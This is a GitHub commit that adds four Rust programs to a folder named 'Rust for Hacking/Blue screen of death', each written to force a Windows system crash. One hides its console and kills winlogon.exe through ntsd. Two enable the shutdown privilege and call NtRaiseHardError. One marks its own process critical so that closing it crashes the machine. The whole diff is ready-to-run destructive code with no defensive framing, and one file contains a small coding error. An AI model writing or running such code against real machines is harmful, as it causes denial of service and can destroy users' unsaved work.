Add files via upload

Author: aw-junaid

Rust for Hacking/Blue screen of death/NTSD_winlogon.rs

@@ -0,0 +1,60 @@
+/*
+    Trigger BSOD by triggeing NTSD on winlogon.exe 
+    @5mukx
+*/
+
+use std::ffi::CString;
+use std::process::Command;
+use winapi::um::wincon::GetConsoleWindow;
+use winapi::um::tlhelp32::{CreateToolhelp32Snapshot, Process32First, Process32Next, PROCESSENTRY32};
+use winapi::um::handleapi::{CloseHandle, INVALID_HANDLE_VALUE};
+use winapi::um::winnt::HANDLE;
+use winapi::um::winuser::{ShowWindow, SW_HIDE};
+
+fn find_pid(procname: &str) -> Option<u32> {
+    unsafe {
+        let h_snapshot: HANDLE = CreateToolhelp32Snapshot(winapi::um::tlhelp32::TH32CS_SNAPPROCESS, 0);
+        if h_snapshot == INVALID_HANDLE_VALUE {
+            return None;
+        }
+
+        let mut pe: PROCESSENTRY32 = std::mem::zeroed();
+        pe.dwSize = std::mem::size_of::<PROCESSENTRY32>() as u32;
+
+        let mut h_result = Process32First(h_snapshot, &mut pe);
+        while h_result != 0 {
+            let exe_file = CString::new(procname).unwrap();
+            let current_exe_file = CString::new(pe.szExeFile.iter().map(|&c| c as u8).collect::<Vec<u8>>()).unwrap();
+
+            if exe_file.as_c_str() == current_exe_file.as_c_str() {
+                CloseHandle(h_snapshot);
+                return Some(pe.th32ProcessID);
+            }
+            h_result = Process32Next(h_snapshot, &mut pe);
+        }
+
+        CloseHandle(h_snapshot);
+        None
+    }
+}
+
+fn main() {
+    unsafe {
+        let h_wnd = GetConsoleWindow();
+        ShowWindow(h_wnd, SW_HIDE);
+    
+        let pid = find_pid("winlogon.exe").or_else(|| find_pid("WINLOGON.EXE"));
+
+        if let Some(pid) = pid {
+            let command = format!("cmd /c start /min ntsd -c q -p {} 1>nul 2>nul", pid);
+            Command::new("cmd")
+                .args(&["/C", &command])
+                .status()
+                .expect("Failed to execute command");
+        } else {
+            println!("Process not found.");
+            return 0;
+        }
+    }
+}
+

Rust for Hacking/Blue screen of death/lookupprivilegevalue.rs

@@ -0,0 +1,69 @@
+/*
+    Program to invoke BSOD setting up privileges and provoking NtRaiseHardError. 
+    @5mukx
+
+*/
+
+use std::ptr;
+use ntapi::ntexapi::NtRaiseHardError;
+use winapi::shared::ntstatus::STATUS_ASSERTION_FAILURE;
+use winapi::shared::wtypesbase::ULONG;
+use winapi::um::processthreadsapi::GetCurrentProcess;
+use winapi::um::processthreadsapi::OpenProcessToken;
+use winapi::um::securitybaseapi::AdjustTokenPrivileges;
+use winapi::um::winnt::{LUID, SE_PRIVILEGE_ENABLED, SE_SHUTDOWN_NAME, TOKEN_ADJUST_PRIVILEGES, TOKEN_PRIVILEGES, TOKEN_QUERY};
+use winapi::um::winbase::LookupPrivilegeValueA;
+use winapi::um::errhandlingapi::GetLastError;
+use std::ffi::CString;
+
+fn main() {
+    println!("Press any key to trigger a BSOD.");
+    let mut input = String::new();
+    std::io::stdin().read_line(&mut input).unwrap();
+
+    unsafe {
+        let mut token_handle: winapi::um::winnt::HANDLE = ptr::null_mut();
+        if OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &mut token_handle) == 0 {
+            println!("Failed to open process token.");
+            return;
+        }
+
+        let mut luid: LUID = LUID { LowPart: 0, HighPart: 0 };
+        let shutdown_privilege = CString::new(SE_SHUTDOWN_NAME).unwrap();
+        if LookupPrivilegeValueA(ptr::null(), shutdown_privilege.as_ptr(), &mut luid) == 0 {
+            println!("Failed to lookup privilege value. Error: {}", GetLastError());
+            return;
+        }
+
+        let tp: TOKEN_PRIVILEGES = TOKEN_PRIVILEGES {
+            PrivilegeCount: 1,
+            Privileges: [winapi::um::winnt::LUID_AND_ATTRIBUTES {
+                Luid: luid,
+                Attributes: SE_PRIVILEGE_ENABLED,
+            }],
+        };
+
+        AdjustTokenPrivileges(token_handle, 0, &tp as *const _ as *mut _, 0, ptr::null_mut(), ptr::null_mut());
+
+        if GetLastError() != 0 {
+            println!("Failed to adjust token privileges. Error: {}", GetLastError());
+            return;
+        }
+
+        // Raise hard error
+        let mut response: ULONG = 0;
+        let status = NtRaiseHardError(
+            STATUS_ASSERTION_FAILURE,
+            0,
+            0,
+            ptr::null_mut(),
+            6,
+            &mut response
+        );
+
+        if status != 0 {
+            println!("Failed to raise hard error. Status: {}", status);
+        }
+    }
+}
+

Rust for Hacking/Blue screen of death/ntsetinformationprocess.rs

@@ -0,0 +1,70 @@
+/*
+    Program to invoke BSOD through NtSetInformationProcess.
+    @5mukx
+*/
+
+use std::mem;
+use std::ptr;
+use std::ffi::CString;
+use winapi::ctypes::c_void;
+use winapi::um::processthreadsapi::{GetCurrentProcess, OpenProcessToken};
+use winapi::um::securitybaseapi::AdjustTokenPrivileges;
+use winapi::um::winnt::{
+    TOKEN_ADJUST_PRIVILEGES, TOKEN_QUERY, SE_DEBUG_NAME, TOKEN_PRIVILEGES, LUID, SE_PRIVILEGE_ENABLED,
+};
+use winapi::um::winbase::LookupPrivilegeValueA;
+use winapi::um::errhandlingapi::GetLastError;
+use ntapi::ntpsapi::NtSetInformationProcess;
+
+fn main() {
+    println!("Invoke BSOD");
+
+    unsafe {
+        let mut token_handle: winapi::um::winnt::HANDLE = ptr::null_mut();
+        if OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &mut token_handle) == 0 {
+            println!("Failed to open process token. Error: {}", GetLastError());
+            return;
+        }
+
+        let mut luid: LUID = LUID { LowPart: 0, HighPart: 0 };
+        let debug_privilege = CString::new(SE_DEBUG_NAME).unwrap();
+        if LookupPrivilegeValueA(ptr::null(), debug_privilege.as_ptr(), &mut luid) == 0 {
+            println!("Failed to lookup privilege value. Error: {}", GetLastError());
+            return;
+        }
+
+        let tp: TOKEN_PRIVILEGES = TOKEN_PRIVILEGES {
+            PrivilegeCount: 1,
+            Privileges: [winapi::um::winnt::LUID_AND_ATTRIBUTES {
+                Luid: luid,
+                Attributes: SE_PRIVILEGE_ENABLED,
+            }],
+        };
+
+        AdjustTokenPrivileges(token_handle, 0, &tp as *const _ as *mut _, 0, ptr::null_mut(), ptr::null_mut());
+
+        let last_error = GetLastError();
+        if last_error != 0 {
+            println!("Failed to adjust token privileges. Error: {}", last_error);
+            return;
+        }
+
+        let current_process: *mut c_void = GetCurrentProcess();
+        let is_critical = 1; 
+        let break_on_termination = 0x1D; 
+
+        let status = NtSetInformationProcess(
+            current_process,
+            break_on_termination as u32,
+            &is_critical as *const _ as *mut _,
+            mem::size_of::<i32>() as u32,
+        );
+
+        if status != 0 {
+            println!("Failed to set process as critical. Status: {}", status);
+        } else {
+            println!("Process is now critical. Close this program to trigger a BSOD.");
+        }
+    }
+}
+

Rust for Hacking/Blue screen of death/rtladjustprivilege.rs

@@ -0,0 +1,47 @@
+/*
+    BSOD using RtlAdjustPrivilege and NtRaiseHardError.
+    @5mukx
+*/
+
+extern crate libc;
+use std::ptr;
+
+#[link(name = "ntdll")]
+extern "system" {
+    fn RtlAdjustPrivilege(
+        Privilege: i32,
+        bEnablePrivilege: bool,
+        IsThreadPrivilege: bool,
+        PreviousValue: *mut bool,
+    ) -> u32;
+
+    fn NtRaiseHardError(
+        ErrorStatus: u32,
+        NumberOfParameters: u32,
+        UnicodeStringParameterMask: u32,
+        Parameters: *const libc::c_void,
+        ValidResponseOption: u32,
+        Response: *mut u32,
+    ) -> u32;
+}
+
+fn main(){
+    unsafe{
+        RtlAdjustPrivilege(
+            19, 
+            true, 
+            false, 
+            &mut false,
+        );
+
+        NtRaiseHardError(
+            0xc0000022, 
+            0, 
+            0, 
+            ptr::null(), 
+            6, 
+            &mut 0,
+        );
+
+    }
+}